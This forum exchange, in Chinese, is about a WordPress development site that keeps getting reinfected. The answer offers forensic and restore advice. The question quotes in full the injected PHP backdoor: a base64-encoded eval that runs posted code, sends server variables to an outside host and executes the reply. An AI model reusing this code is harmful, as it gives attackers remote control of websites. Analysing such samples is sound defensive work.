我正在一个WordPress网站上工作,该网站每x周就会被恶意软件感染一次,但我们找不到问题的原因。一些背景信息:
该网站位于受密码保护的独立开发域中。在开发过程中,我们在有更新的时候对软件进行了更新。结果是,在随机数周后,当我们试图访问网站时,我们会被重定向到垃圾邮件网站。网站本身在第一次访问时变得非常慢,之后速度再次合理。我们只有1个管理员帐户和几个编辑在网站上工作,以转移内容。因此,只有少数值得信赖的人可以访问该网站。
我们的托管公司对恶意软件进行筛选/扫描,但似乎为时已晚,无法阻止原因。
我们只安装了少数几个看起来合法的插件。下面的列表:
- 经典编辑器
- 仪表板中的可折叠类别(这个插件没有被很多人使用,所以可能有风险?)
- 古腾堡
- 对齐的图像网格
- 显示ID
- tagDiv云库
- tagDiv作曲家
- tagDiv社交计数器
- tagDiv标准套装
- Wordpress导入程序
- Yoast SEO
所有插件和WordPress本身都会一直更新到最新的可用版本。
我们已经安装了tagDiv Newspaper主题版10.0,但之前的版本也有问题。在每次重新安装WordPress网站时,我们都会删除所有文件和整个数据库,并要求托管公司仔细检查我们遗漏的文件。我们有其他网站在同一台服务器上运行,没有任何问题,所以问题似乎仅限于dev/wordpress网站。在每次清理过程中,我们都重新设置了所有相关密码(数据库、ftp)。tagDiv报纸主题似乎多次成为恶意软件注入的目标,因此这是一个危险信号。不幸的是,已经做了很多工作,改变主题会有问题,而且我不是100%,是主题造成了问题。
感染后,所有*.php文件在每个.php文件的顶部都有这个额外的php代码:
<?php /*8968665*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KCi8vaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIsIGZhbHNlICwkY29udGV4dF9qaGtiKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307CiB9CiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*8968665*/ ?><?php
据我所知,数据库似乎没有受到任何影响。
在网站的根目录pl中创建了文件名PayPAl2019.zip和许多子文件夹,这些子文件夹似乎可以处理某种付款。我能找到的文件中的IP引用指向IP:^64.106.213.*,该文件属于DataPipe,股份有限公司
在WordPress目录根目录中创建的文件有588eqpn7.php、u9hwrd7d.php和shell.php。最后一个文件被任何病毒扫描程序识别为特洛伊木马:trojan:Script/Casur。A.cl.
一些文件的日期戳也很奇怪。例如2018年,但当时开发场地还不存在?
我对服务器的ssh访问权限有限,但没有权限执行一些需要深入挖掘的命令。
我的问题是:
- 如何找出这个WordPress网站的感染原因
- 如何在不损失太多工作的情况下恢复网站?因为前几次删除所有内容都无济于事
很难从你所说的内容中感受到到底发生了什么。根据密码保护和您的设置,某些情况比其他情况更有可能发生。如果您使用例如Apache的基本身份验证模块,攻击者将不得不绕过这一点或通过其他方式访问(同一机器上的另一个主机,这可能是错误设置权限的提示,或者主机被泄露,等等)。如果有应用程序级别的密码保护(例如通过WordPress),它可能无法阻止对某些易受攻击的资源的访问。
你所描述的"再次感染"可能是由于持续的后门(或未修补的易受攻击组件),所以这也不容易判断。
一般来说,如果我对安装进行取证分析,我会从随机命名的文件开始,看看它们是何时访问的,访问的参数是什么。从那里我会得到攻击者所做的暗示,也许对最初妥协的时间框架有一个大致的想法。这样就可以很容易地恢复到已知的良好备份,而不会浪费太多时间。
在这种情况下,a)重建基础结构(在本例中为应用程序)或(如果可用)b)从已知的良好备份中恢复是有意义的。令人担忧的是,有多少托管商没有工作或备份不足,有多少客户选择低价而不是(数据)安全。
为了安全起见,您可以下载一份安装副本,并在一个单独的文件夹中重建一个快速而肮脏的安装,然后将两个文件夹进行比较,找出差异(这些差异可能来自攻击者,也可能是手动配置/开发的)。这是一个经济问题,你想投入多少时间来重建多少安装。如果你花的时间太少,攻击者又回来了,那你就倒霉了。
。。。另外,做备份